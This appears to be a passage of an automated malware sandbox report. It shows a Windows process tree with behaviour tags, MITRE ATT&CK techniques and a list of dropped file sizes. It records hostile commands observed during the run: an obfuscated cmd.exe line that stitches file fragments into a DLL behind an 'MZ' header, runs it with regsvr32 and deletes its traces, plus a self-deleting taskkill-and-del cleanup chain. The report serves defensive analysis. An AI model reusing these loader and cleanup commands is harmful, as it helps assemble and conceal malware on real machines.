C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i © /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"7⤵
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe ..\LphZr4.XZ /U -S7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "FE95.exe"4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9F0.exeC:\Users\Admin\AppData\Local\Temp\9F0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9F0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9F0.exe" & del C:\ProgramData\*.dll & exit2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9F0.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5624 -s 27882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\66878183f6bd43eda95c59004f8fadb3 /t 5160 /p 60161⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1616 -s 19202⤵
- Program crash
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
-
Filesize
36KB
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
28KB
-
Filesize
9.3MB
-
Filesize
9.1MB
-
Filesize
316KB
-
Filesize
76KB
-
Filesize
584KB
-
Filesize
580KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
316KB
-
Filesize
36KB
-
Filesize
1.1MB
-
Filesize
48KB
-
Filesize
24KB
-
Filesize
88KB
-
Filesize
92KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
384KB
-
Filesize
108KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
2.3MB
-
Filesize
384KB
-
Filesize
384KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
436KB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
48KB
-
Filesize
8KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
36KB
-
Filesize
20KB
-
Filesize
84KB
-
Filesize
92KB
-
Filesize
580KB
-
Filesize
584KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
388KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
100KB
-
Filesize
108KB
-
Filesize
316KB
-
Filesize
264KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
19.7MB
-
Filesize
2.4MB
-
Filesize
4KB